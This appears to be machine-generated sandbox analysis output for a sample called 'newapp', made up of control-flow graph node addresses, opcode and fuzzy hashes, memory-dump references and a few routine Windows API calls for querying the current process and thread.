                                                                                                                • Opcode ID: 7f01a8571d30b9be17dcadef9988db928502e175c553245558424f34a51ae78c
                                                                                                                • Instruction ID: ce0bd30e1fd67d2436a34becf8925db704306a38a00d1c96078d5498986ac523
                                                                                                                • Opcode Fuzzy Hash: 7f01a8571d30b9be17dcadef9988db928502e175c553245558424f34a51ae78c
                                                                                                                • Instruction Fuzzy Hash: 7C322F31E1071ACFCB54EF75C95459DB7B2BFC9300F1086AAD409AB365EB30AA85CB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 873 6677e68-6677e86 874 6677e88-6677e8b 873->874 875 6677e8d-6677ea7 874->875 876 6677eac-6677eaf 874->876 875->876 877 6677ed2-6677ed5 876->877 878 6677eb1-6677ecd 876->878 879 6677ed7-6677ee1 877->879 880 6677ee2-6677ee5 877->880 878->877 882 6677ee7-6677ef5 880->882 883 6677efc-6677efe 880->883 890 6677f0e-6677f24 882->890 891 6677ef7 882->891 885 6677f05-6677f08 883->885 886 6677f00 883->886 885->874 885->890 886->885 893 667813f-6678149 890->893 894 6677f2a-6677f33 890->894 891->883 895 667814a-6678158 894->895 896 6677f39-6677f56 894->896 899 66781af-66781bc 895->899 900 667815a-667817f 895->900 904 667812c-6678139 896->904 905 6677f5c-6677f84 896->905 903 66781c7-66781c9 899->903 902 6678181-6678184 900->902 906 66781a7-66781aa 902->906 907 6678186-66781a2 902->907 908 66781e1-66781e5 903->908 909 66781cb-66781d1 903->909 904->893 904->894 905->904 930 6677f8a-6677f93 905->930 906->899 910 6678257-667825a 906->910 907->906 915 66781e7-66781f1 908->915 916 66781f3 908->916 911 66781d5-66781d7 909->911 912 66781d3 909->912 913 6678260-667826f 910->913 914 667848f-6678491 910->914 911->908 912->908 928 6678271-667828c 913->928 929 667828e-66782d2 913->929 919 6678493 914->919 920 6678498-667849b 914->920 921 66781f8-66781fa 915->921 916->921 919->920 920->902 922 66784a1-66784aa 920->922 925 6678211-667824a 921->925 926 66781fc-66781ff 921->926 925->913 951 667824c-6678256 925->951 926->922 928->929 935 6678463-6678479 929->935 936 66782d8-66782e9 929->936 930->895 931 6677f99-6677fb5 930->931 941 6677fbb-6677fe5 931->941 942 667811a-6678126 931->942 935->914 946 66782ef-667830c 936->946 947 667844e-667845d 936->947 956 6678110-6678115 941->956 957 6677feb-6678013 941->957 942->904 942->930 946->947 958 6678312-6678408 call 6676690 946->958 947->935 947->936 956->942 957->956 964 6678019-6678047 957->964 1007 6678416 958->1007 1008 667840a-6678414 958->1008 964->956 970 667804d-6678056 964->970 970->956 971 667805c-667808e 970->971 978 6678090-6678094 971->978 979 6678099-66780b5 971->979 978->956 981 6678096 978->981 979->942 982 66780b7-667810e call 6676690 979->982 981->979 982->942 1009 667841b-667841d 1007->1009 1008->1009 1009->947 1010 667841f-6678424 1009->1010 1011 6678426-6678430 1010->1011 1012 6678432 1010->1012 1013 6678437-6678439 1011->1013 1012->1013 1013->947 1014 667843b-6678447 1013->1014 1014->947
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: 3d7f0ccf21b96e0f7e0ac67a92db04f776596c071d3a8dceda44c5b9855c7535
                                                                                                                • Instruction ID: 53faf030dbb83287e831bd074e4cd2188cf034a7c8dc1a40f8b94eb3ff2767a9
                                                                                                                • Opcode Fuzzy Hash: 3d7f0ccf21b96e0f7e0ac67a92db04f776596c071d3a8dceda44c5b9855c7535
                                                                                                                • Instruction Fuzzy Hash: 5302AC30B002069FDB54DF68D994AAEB7E2EF84314F248439D40A9B395DB35ED86CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7f460c1ebce9497f39f9f824958380abf34b90000273a292d708aaf74ae4b474
                                                                                                                • Instruction ID: bd33136d96eeb11e31cb665965ec6699e7fe63c69281973d8050405855f67fb4
                                                                                                                • Opcode Fuzzy Hash: 7f460c1ebce9497f39f9f824958380abf34b90000273a292d708aaf74ae4b474
                                                                                                                • Instruction Fuzzy Hash: BC62DF34B006049FDB54DF68D594AADBBF2EF88314F248469E40ADB395DB35EC46CBA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c28287254b1443f778aef75e925b19d8977c7f04513d0839a0ea2c08a0d794fd
                                                                                                                • Instruction ID: eeeb33ddf9c25b527eded4fba7ce0dd5f07037ac62f7430ca4b6ffdb3eca78cd
                                                                                                                • Opcode Fuzzy Hash: c28287254b1443f778aef75e925b19d8977c7f04513d0839a0ea2c08a0d794fd
                                                                                                                • Instruction Fuzzy Hash: 75328334B002059FDF54EB68D990BADBBB6FB88314F108529E409EB395DB35EC46CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 30afc641a0d095476bedb6378cebb4768b689b5251d544a59806ff1aa8f17163
                                                                                                                • Instruction ID: b6023a194893b900b77209255598e7c14c53f675cd7c53d5da572f978050b569
                                                                                                                • Opcode Fuzzy Hash: 30afc641a0d095476bedb6378cebb4768b689b5251d544a59806ff1aa8f17163
                                                                                                                • Instruction Fuzzy Hash: F622D471F002159FDF60DB64C8847AEB7A2EB84320F2484B9E85A9B345DF34ED41CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 32936c4c9f6fc1ec78455596a95180830cc58e705b37f7b9497b76de9d1ba141
                                                                                                                • Instruction ID: c9fdf6c71fb9af1cef25fb798822faa54f8783eb1073e59625e22cb42b47a5a0
                                                                                                                • Opcode Fuzzy Hash: 32936c4c9f6fc1ec78455596a95180830cc58e705b37f7b9497b76de9d1ba141
                                                                                                                • Instruction Fuzzy Hash: 97228330F102099FDF64DF68D5807AEB7B5EB85310F248926E409EB395CA35DD81CBA1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 667adb0-667adce 1 667add0-667add3 0->1 2 667adf6-667adf9 1->2 3 667add5-667adf1 1->3 4 667adfb-667adff 2->4 5 667ae0a-667ae0d 2->5 3->2 7 667ae05 4->7 8 667afdc-667afe6 4->8 9 667ae0f-667ae18 5->9 10 667ae1d-667ae20 5->10 7->5 9->10 11 667ae26-667ae29 10->11 12 667afcd-667afd6 10->12 14 667ae3d-667ae40 11->14 15 667ae2b-667ae38 11->15 12->8 16 667ae6c-667ae75 12->16 17 667ae42-667ae55 14->17 18 667ae5a-667ae5d 14->18 15->14 19 667afe7-667b01e 16->19 20 667ae7b-667ae7f 16->20 17->18 21 667ae67-667ae6a 18->21 22 667ae5f-667ae64 18->22 29 667b020-667b023 19->29 23 667ae84-667ae86 20->23 21->16 21->23 22->21 27 667ae8d-667ae90 23->27 28 667ae88 23->28 27->1 30 667ae96-667aeba 27->30 28->27 31 667b025 call 667b307 29->31 32 667b032-667b035 29->32 43 667aec0-667aecf 30->43 44 667afca 30->44 36 667b02b-667b02d 31->36 33 667b29e-667b2a1 32->33 34 667b03b-667b076 32->34 37 667b2a3-667b2ad 33->37 38 667b2ae-667b2b1 33->38 47 667b07c-667b088 34->47 48 667b269-667b27c 34->48 36->32 40 667b2d4-667b2d7 38->40 41 667b2b3-667b2cf 38->41 45 667b2d9-667b2dd 40->45 46 667b2e8-667b2ea 40->46 41->40 57 667aee7-667af22 call 6676690 43->57 58 667aed1-667aed7 43->58 44->12 45->34 50 667b2e3 45->50 51 667b2f1-667b2f4 46->51 52 667b2ec 46->52 60 667b08a-667b0a3 47->60 61 667b0a8-667b0ec 47->61 53 667b27e 48->53 50->46 51->29 56 667b2fa-667b304 51->56 52->51 53->33 75 667af24-667af2a 57->75 76 667af3a-667af51 57->76 62 667aedb-667aedd 58->62 63 667aed9 58->63 60->53 77 667b0ee-667b100 61->77 78 667b108-667b147 61->78 62->57 63->57 79 667af2e-667af30 75->79 80 667af2c 75->80 90 667af53-667af59 76->90 91 667af69-667af7a 76->91 77->78 84 667b22e-667b243 78->84 85 667b14d-667b228 call 6676690 78->85 79->76 80->76 84->48 85->84 93 667af5d-667af5f 90->93 94 667af5b 90->94 97 667af92-667afc3 91->97 98 667af7c-667af82 91->98 93->91 94->91 97->44 100 667af86-667af88 98->100 101 667af84 98->101 100->97 101->97
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-3823777903
                                                                                                                • Opcode ID: f89511317872587278fa745c66b4da31dc75e19363d28eccf9d50f77cb2175de
                                                                                                                • Instruction ID: aaa20f7e8da15cdafa2c57ba3de2ea943a8cf4f0f401cf9a36adf7a0fd1416c7
                                                                                                                • Opcode Fuzzy Hash: f89511317872587278fa745c66b4da31dc75e19363d28eccf9d50f77cb2175de
                                                                                                                • Instruction Fuzzy Hash: A8E17C30F1020A8FCB55EFA9D5846AEB7B2EF85304F208529D419DB395DB35E846CB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 254 667b730-667b752 255 667b754-667b757 254->255 256 667b75e-667b761 255->256 257 667b759-667b75b 255->257 258 667b7c5-667b7c8 256->258 259 667b763-667b7c0 call 6676690 256->259 257->256 260 667b7ef-667b7f2 258->260 261 667b7ca-667b7ce 258->261 259->258 265 667b7f4-667b7fd 260->265 266 667b802-667b805 260->266 262 667b7d4-667b7e4 261->262 263 667bacb-667bae4 261->263 281 667b8d3-667b8d6 262->281 282 667b7ea 262->282 283 667bae6-667bb06 263->283 284 667bb08-667bb0b 263->284 265->266 268 667b8a2-667b8ab 266->268 269 667b80b-667b80e 266->269 270 667b8b1 268->270 271 667ba8a-667ba93 268->271 275 667b825-667b828 269->275 276 667b810-667b814 269->276 280 667b8b6-667b8b9 270->280 271->263 279 667ba95-667ba9c 271->279 277 667b83b-667b83e 275->277 278 667b82a-667b836 275->278 276->263 285 667b81a-667b820 276->285 286 667b852-667b855 277->286 287 667b840-667b847 277->287 278->277 288 667baa1-667baa4 279->288 280->281 289 667b8bb-667b8be 280->289 290 667b8db-667b8de 281->290 282->260 283->284 292 667bb2e-667bb31 284->292 293 667bb0d-667bb29 284->293 285->275 301 667b867-667b86a 286->301 302 667b857 286->302 295 667b84d 287->295 296 667b8fa-667b903 287->296 297 667baa6-667baa9 288->297 298 667baae-667bab0 288->298 303 667b8c0-667b8c9 289->303 304 667b8ce-667b8d1 289->304 305 667b8f5-667b8f8 290->305 306 667b8e0-667b8e4 290->306 299 667bb37-667bb5f 292->299 300 667bd9d-667bd9f 292->300 293->292 295->286 312 667b908-667b90b 296->312 297->298 309 667bab7-667baba 298->309 310 667bab2 298->310 348 667bb61-667bb64 299->348 349 667bb69-667bbad 299->349 307 667bda6-667bda9 300->307 308 667bda1 300->308 314 667b877-667b87a 301->314 315 667b86c-667b872 301->315 322 667b85f-667b862 302->322 303->304 304->281 304->290 305->296 305->312 306->263 311 667b8ea-667b8f0 306->311 307->284 319 667bdaf-667bdb8 307->319 308->307 309->255 321 667bac0-667baca 309->321 310->309 311->305 317 667b932-667b935 312->317 318 667b90d-667b911 312->318 323 667b89d-667b8a0 314->323 324 667b87c-667b880 314->324 315->314 327 667b937-667b93a 317->327 328 667b94c-667b94f 317->328 318->263 325 667b917-667b927 318->325 322->301 323->268 323->280 324->263 329 667b886-667b896 324->329 325->261 342 667b92d 325->342 327->263 331 667b940-667b947 327->331 328->281 332 667b951-667b954 328->332 329->318 341 667b898 329->341 331->328 337 667b977-667b97a 332->337 338 667b956-667b972 332->338 339 667b97c-667b985 337->339 340 667b98a-667b98d 337->340 338->337 339->340 344 667b995-667b998 340->344 345 667b98f-667b990 340->345 341->323 342->317 350 667b9af-667b9b2 344->350 351 667b99a-667b99e 344->351 345->344 348->319 368 667bbb3-667bbbc 349->368 369 667bd92-667bd9c 349->369 353 667b9b4-667b9b9 350->353 354 667b9bc-667b9bf 350->354 351->263 352 667b9a4-667b9aa 351->352 352->350 353->354 357 667b9c1-667b9c4 354->357 358 667b9cf-667b9d2 354->358 357->327 360 667b9ca 357->360 361 667b9f4-667b9f7 358->361 362 667b9d4-667b9ef 358->362 360->358 361->281 363 667b9fd-667ba00 361->363 362->361 366 667ba02-667ba17 363->366 367 667ba3f-667ba42 363->367 366->263 377 667ba1d-667ba3a 366->377 370 667ba44-667ba59 367->370 371 667ba7c-667ba7f 367->371 373 667bbc2-667bc2e call 6676690 368->373 374 667bd88-667bd8d 368->374 370->263 381 667ba5b-667ba77 370->381 371->357 372 667ba85-667ba88 371->372 372->271 372->288 389 667bc34-667bc39 373->389 390 667bd28-667bd3d 373->390 374->369 377->367 381->371 391 667bc55 389->391 392 667bc3b-667bc41 389->392 390->374 396 667bc57-667bc5d 391->396 394 667bc47-667bc49 392->394 395 667bc43-667bc45 392->395 397 667bc53 394->397 395->397 398 667bc72-667bc7f 396->398 399 667bc5f-667bc65 396->399 397->396 406 667bc97-667bca4 398->406 407 667bc81-667bc87 398->407 400 667bd13-667bd22 399->400 401 667bc6b 399->401 400->389 400->390 401->398 402 667bca6-667bcb3 401->402 403 667bcda-667bce7 401->403 415 667bcb5-667bcbb 402->415 416 667bccb-667bcd8 402->416 412 667bcff-667bd0c 403->412 413 667bce9-667bcef 403->413 406->400 410 667bc8b-667bc8d 407->410 411 667bc89 407->411 410->406 411->406 412->400 419 667bcf3-667bcf5 413->419 420 667bcf1 413->420 417 667bcbf-667bcc1 415->417 418 667bcbd 415->418 416->400 417->416 418->416 419->412 420->412
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2392861976
                                                                                                                • Opcode ID: 8a780d6384c458f13a1ec1eea39084c82930fd2f58f4b606e98e7bea52971d8d
                                                                                                                • Instruction ID: 2834a659d9b8ab3c0f0de1e74c2e87edd2890b25f5b4bffd2e04224e2d4f22e8
                                                                                                                • Opcode Fuzzy Hash: 8a780d6384c458f13a1ec1eea39084c82930fd2f58f4b606e98e7bea52971d8d
                                                                                                                • Instruction Fuzzy Hash: D5029B30E002099FDFA4DF68D5806ADB7B1EF85314F24892AE409DB355DB35EC86CB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 423 666a247-666a249 424 666a2ae-666a337 GetCurrentProcess 423->424 425 666a24b-666a271 423->425 431 666a340-666a374 GetCurrentThread 424->431 432 666a339-666a33f 424->432 425->424 433 666a376-666a37c 431->433 434 666a37d-666a3b1 GetCurrentProcess 431->434 432->431 433->434 436 666a3b3-666a3b9 434->436 437 666a3ba-666a3d5 call 666a478 434->437 436->437 440 666a3db-666a40a GetCurrentThreadId 437->440 441 666a413-666a475 440->441 442 666a40c-666a412 440->442 442->441
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0666A326
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0666A363
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0666A3A0
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0666A3F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: a741211abead193d0c5850f6046a46511c8793a015d34b135dd7376df161aeb3
                                                                                                                • Instruction ID: 3732cc82755726b565825e6c2809d6857ac34ddcde0f168809613e01c3c6d2ff
                                                                                                                • Opcode Fuzzy Hash: a741211abead193d0c5850f6046a46511c8793a015d34b135dd7376df161aeb3
                                                                                                                • Instruction Fuzzy Hash: EB5177B09013498FDB84DFAAD9487DEBFF1EF48304F24805AE459B72A1C7349984CB65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 449 666a299-666a2a0 450 666a2a2-666a2a8 449->450 451 666a2a9-666a337 GetCurrentProcess 449->451 450->451 457 666a340-666a374 GetCurrentThread 451->457 458 666a339-666a33f 451->458 459 666a376-666a37c 457->459 460 666a37d-666a3b1 GetCurrentProcess 457->460 458->457 459->460 462 666a3b3-666a3b9 460->462 463 666a3ba-666a3d5 call 666a478 460->463 462->463 466 666a3db-666a40a GetCurrentThreadId 463->466 467 666a413-666a475 466->467 468 666a40c-666a412 466->468 468->467
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0666A326
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0666A363
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0666A3A0
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0666A3F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 6487a8ff4c7b1e08bed6641f1fbda74cf790df8ea217957d814a910bf714a250
                                                                                                                • Instruction ID: a076edceb223374dd790aa136adac735be861566209416652f5357755f3d75f3
                                                                                                                • Opcode Fuzzy Hash: 6487a8ff4c7b1e08bed6641f1fbda74cf790df8ea217957d814a910bf714a250
                                                                                                                • Instruction Fuzzy Hash: 6A5155B09003099FDB94DFAAD949BDEBBF6EB48304F208059E419B73A0C7359984CF65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 475 666a2a8-666a337 GetCurrentProcess 481 666a340-666a374 GetCurrentThread 475->481 482 666a339-666a33f 475->482 483 666a376-666a37c 481->483 484 666a37d-666a3b1 GetCurrentProcess 481->484 482->481 483->484 486 666a3b3-666a3b9 484->486 487 666a3ba-666a3d5 call 666a478 484->487 486->487 490 666a3db-666a40a GetCurrentThreadId 487->490 491 666a413-666a475 490->491 492 666a40c-666a412 490->492 492->491
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0666A326
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0666A363
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0666A3A0
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0666A3F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 735b7b6a7b102b6166c7a1d219a8531359fb83f57408f036a7d3997562561384
                                                                                                                • Instruction ID: 37b6a3f784631e4237e7146001930761f674a58eb83bcf46238c1157df1b45ef
                                                                                                                • Opcode Fuzzy Hash: 735b7b6a7b102b6166c7a1d219a8531359fb83f57408f036a7d3997562561384
                                                                                                                • Instruction Fuzzy Hash: 905126B09003098FDB94DFAAD949B9EBBF1EF48314F208459E419B73A0D7359984CF65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 499 6679238-667925d 500 667925f-6679262 499->500 501 6679b20-6679b23 500->501 502 6679268-667927d 500->502 503 6679b25-6679b44 501->503 504 6679b49-6679b4b 501->504 508 6679295-66792ab 502->508 509 667927f-6679285 502->509 503->504 506 6679b52-6679b55 504->506 507 6679b4d 504->507 506->500 511 6679b5b-6679b65 506->511 507->506 516 66792b6-66792b8 508->516 512 6679287 509->512 513 6679289-667928b 509->513 512->508 513->508 517 66792d0-6679341 516->517 518 66792ba-66792c0 516->518 529 6679343-6679366 517->529 530 667936d-6679389 517->530 519 66792c4-66792c6 518->519 520 66792c2 518->520 519->517 520->517 529->530 535 66793b5-66793d0 530->535 536 667938b-66793ae 530->536 541 66793d2-66793f4 535->541 542 66793fb-6679416 535->542 536->535 541->542 547 667943b-6679449 542->547 548 6679418-6679434 542->548 549 667944b-6679454 547->549 550 6679459-66794d3 547->550 548->547 549->511 556 66794d5-66794f3 550->556 557 6679520-6679535 550->557 561 66794f5-6679504 556->561 562 667950f-667951e 556->562 557->501 561->562 562->556 562->557
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 3ae26e77ed3c74604402781f06d27a0a8374a7464d203645b774a13937cd382b
                                                                                                                • Instruction ID: ac6ed335eda5bb09c7aa75dd6b2bd92d41f53dc3a629430b0bd6e82f3c43faaa
                                                                                                                • Opcode Fuzzy Hash: 3ae26e77ed3c74604402781f06d27a0a8374a7464d203645b774a13937cd382b
                                                                                                                • Instruction Fuzzy Hash: 74915F30B1021A9FDB54DF65D9507AFB7F6AB89308F108569C40DEB788EE30ED468B91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 565 667d038-667d053 566 667d055-667d058 565->566 567 667d0a1-667d0a4 566->567 568 667d05a-667d09c 566->568 569 667d0a6-667d0e8 567->569 570 667d0ed-667d0f0 567->570 568->567 569->570 572 667d0f2-667d0f4 570->572 573 667d0ff-667d102 570->573 574 667d521 572->574 575 667d0fa 572->575 576 667d104-667d113 573->576 577 667d14b-667d14e 573->577 579 667d524-667d530 574->579 575->573 583 667d115-667d11a 576->583 584 667d122-667d12e 576->584 580 667d197-667d19a 577->580 581 667d150-667d192 577->581 579->576 585 667d536-667d823 579->585 586 667d1a4-667d1a7 580->586 587 667d19c-667d1a1 580->587 581->580 583->584 588 667da55-667da8e 584->588 589 667d134-667d146 584->589 778 667da4a-667da54 585->778 779 667d829-667d82f 585->779 591 667d1b6-667d1b9 586->591 592 667d1a9-667d1ab 586->592 587->586 604 667da90-667da93 588->604 589->577 591->579 599 667d1bf-667d1c2 591->599 596 667d1b1 592->596 597 667d3df-667d3e8 592->597 596->591 606 667d3f7-667d403 597->606 607 667d3ea-667d3ef 597->607 602 667d1e5-667d1e8 599->602 603 667d1c4-667d1e0 599->603 613 667d231-667d234 602->613 614 667d1ea-667d22c 602->614 603->602 611 667dac6-667dac9 604->611 612 667da95-667dac1 604->612 615 667d514-667d519 606->615 616 667d409-667d41d 606->616 607->606 620 667dacb call 667dbad 611->620 621 667dad8-667dadb 611->621 612->611 618 667d236-667d278 613->618 619 667d27d-667d280 613->619 614->613 615->574 616->574 636 667d423-667d435 616->636 618->619 624 667d282-667d2c4 619->624 625 667d2c9-667d2cc 619->625 634 667dad1-667dad3 620->634 629 667dafe-667db00 621->629 630 667dadd-667daf9 621->630 624->625 640 667d2ce-667d2e4 625->640 641 667d2e9-667d2ec 625->641 637 667db07-667db0a 629->637 638 667db02 629->638 630->629 634->621 658 667d437-667d43d 636->658 659 667d459-667d45b 636->659 637->604 645 667db0c-667db1b 637->645 638->637 640->641 642 667d335-667d338 641->642 643 667d2ee-667d330 641->643 653 667d381-667d384 642->653 654 667d33a-667d37c 642->654 643->642 673 667db82-667db97 645->673 674 667db1d-667db80 call 6676690 645->674 663 667d386-667d395 653->663 664 667d3cd-667d3cf 653->664 654->653 670 667d441-667d44d 658->670 671 667d43f 658->671 668 667d465-667d471 659->668 675 667d397-667d39c 663->675 676 667d3a4-667d3b0 663->676 666 667d3d6-667d3d9 664->666 667 667d3d1 664->667 666->566 666->597 667->666 694 667d473-667d47d 668->694 695 667d47f 668->695 681 667d44f-667d457 670->681 671->681 692 667db98 673->692 674->673 675->676 676->588 677 667d3b6-667d3c8 676->677 677->664 681->668 692->692 699 667d484-667d486 694->699 695->699 699->574 705 667d48c-667d4a8 call 6676690 699->705 718 667d4b7-667d4c3 705->718 719 667d4aa-667d4af 705->719 718->615 720 667d4c5-667d512 718->720 719->718 720->574 780 667d831-667d836 779->780 781 667d83e-667d847 779->781 780->781 781->588 782 667d84d-667d860 781->782 784 667d866-667d86c 782->784 785 667da3a-667da44 782->785 786 667d86e-667d873 784->786 787 667d87b-667d884 784->787 785->778 785->779 786->787 787->588 788 667d88a-667d8ab 787->788 791 667d8ad-667d8b2 788->791 792 667d8ba-667d8c3 788->792 791->792 792->588 793 667d8c9-667d8e6 792->793 793->785 796 667d8ec-667d8f2 793->796 796->588 797 667d8f8-667d911 796->797 799 667d917-667d93e 797->799 800 667da2d-667da34 797->800 799->588 803 667d944-667d94e 799->803 800->785 800->796 803->588 804 667d954-667d96b 803->804 806 667d96d-667d978 804->806 807 667d97a-667d995 804->807 806->807 807->800 812 667d99b-667d9b4 call 6676690 807->812 816 667d9b6-667d9bb 812->816 817 667d9c3-667d9cc 812->817 816->817 817->588 818 667d9d2-667da26 817->818 818->800
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q
                                                                                                                • API String ID: 0-831282457
                                                                                                                • Opcode ID: 373fc180e3cae144e6187b38e38b39a125ee1a9be7c35a66f5fe95d95b917358
                                                                                                                • Instruction ID: ff3fa9f3e63d222be55e2abcf5897576c3602de4477d98f84de4bcf37c28c30f
                                                                                                                • Opcode Fuzzy Hash: 373fc180e3cae144e6187b38e38b39a125ee1a9be7c35a66f5fe95d95b917358
                                                                                                                • Instruction Fuzzy Hash: A3626430A002059FCB55EF68D690A5DB7F2FF84708F248969D0099F769DB71ED8ACB90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 826 6674c78-6674c9c 827 6674c9e-6674ca1 826->827 828 6674ca3-6674cbd 827->828 829 6674cc2-6674cc5 827->829 828->829 830 66753a4-66753a6 829->830 831 6674ccb-6674dc3 829->831 833 66753ad-66753b0 830->833 834 66753a8 830->834 849 6674e46-6674e4d 831->849 850 6674dc9-6674e16 call 6675522 831->850 833->827 835 66753b6-66753c3 833->835 834->833 851 6674e53-6674ec3 849->851 852 6674ed1-6674eda 849->852 863 6674e1c-6674e38 850->863 869 6674ec5 851->869 870 6674ece 851->870 852->835 867 6674e43-6674e44 863->867 868 6674e3a 863->868 867->849 868->867 869->870 870->852
                                                                                                                Strings
                                                                                                                Memory Dump Source
